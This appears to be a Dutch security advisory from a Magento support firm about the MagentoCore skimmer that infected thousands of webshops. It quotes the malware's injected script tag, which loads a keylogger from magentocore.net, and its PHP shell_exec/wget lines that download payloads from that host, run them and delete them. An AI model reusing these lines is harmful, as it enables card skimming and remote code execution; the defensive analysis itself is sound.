Magento & Shopware
Services

Magento-skimmer infecteert 400 Magento webshops in Nederland en duizenden in het buitenland

Één groep hackers is verantwoordelijk voor het infecteren van meer dan 7000 Magento webshops, verspreid over de hele wereld. De MagentoCore skimmer, het stuk software dat hiervoor gebruikt wordt, is hiermee de meest succesvolle (en daarmee ook meest gevreesde) tot nu toe. De getroffen websites betreffen kleine Magento shops maar ook grote multinationals.

De 7339 Magento shops zijn allemaal geïnfecteerd in de afgelopen 6 maanden. Veel daarvan hadden dit binnen enkele weken door, maar bijna 1500 shops hebben de ‘parasiet’ voor bijna de volledige 6 maanden in de Magento core genesteld gehad. En de groep is nog niet klaar! Sterker nog, het tempo is omhoog gegaan. Uit onderzoek gebleken dat de groep in de afgelopen 2 weken 50 tot 60 nieuwe shops per dag infecteert. Op dit tempo zouden ze in theorie de komende 6 maanden nog eens 10.000 webshops kunnen infecteren.

Wat doet de MagentoCore skimmer?

De MagentoCore skimmer krijgt toegang tot de backend door (onder andere) gebruik te maken van een brute-force aanvallen (automatisch verschillende wachtwoorden proberen, soms wel voor maanden lang). Eenmaal het juiste wachtwoord, dan worden er een stukjes code op de website geplaatst en dan begint alle ellendigheid.

Een stukje javascript wordt geplaatst in de HTML template:

<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>

Dit script registreert wat de klant op zijn toetsenbord intypt en stuurt dit real-time naar de “Magentocore.net” server, die ergens in Moskou staat.

Het heeft zelfs een eigen backup systeem door gebruik te maken van cron.php. Hiermee download het script periodiek virussen, voert het uit en daarna verwijderd het zichzelf weer, zodat er sporen worden achtergelaten. Dit ziet er als volgt uit:

shell_exec("wget -c https://magentocore.net/clean.json -O ./app/code/core/clean.php 2>&1");
shell_exec("wget -c https://magentocore.net/clear.json -O ./app/code/core/clear.php 2>&1");
shell_exec("php ./app/code/core/clean.php 2>&1");
shell_exec("php ./app/code/core/clear.php 2>&1");
unlink('./app/code/core/clean.php');
unlink('./app/code/core/clear.php');

Advies van SupportDesk

Wij raden alle Magento webshopeigenaren hun developer te laten checken of er in de broncode onbekende >scripts< worden geladen. SupportDesk heeft veel ervaring op het gebied van Magento security. Denkt u dat uw shop is geïnfecteerd of heeft u hulp nodig met een scan op dit uit te sluiten? Neem gerust vrijblijvend contact op met een van onze Magento security experts.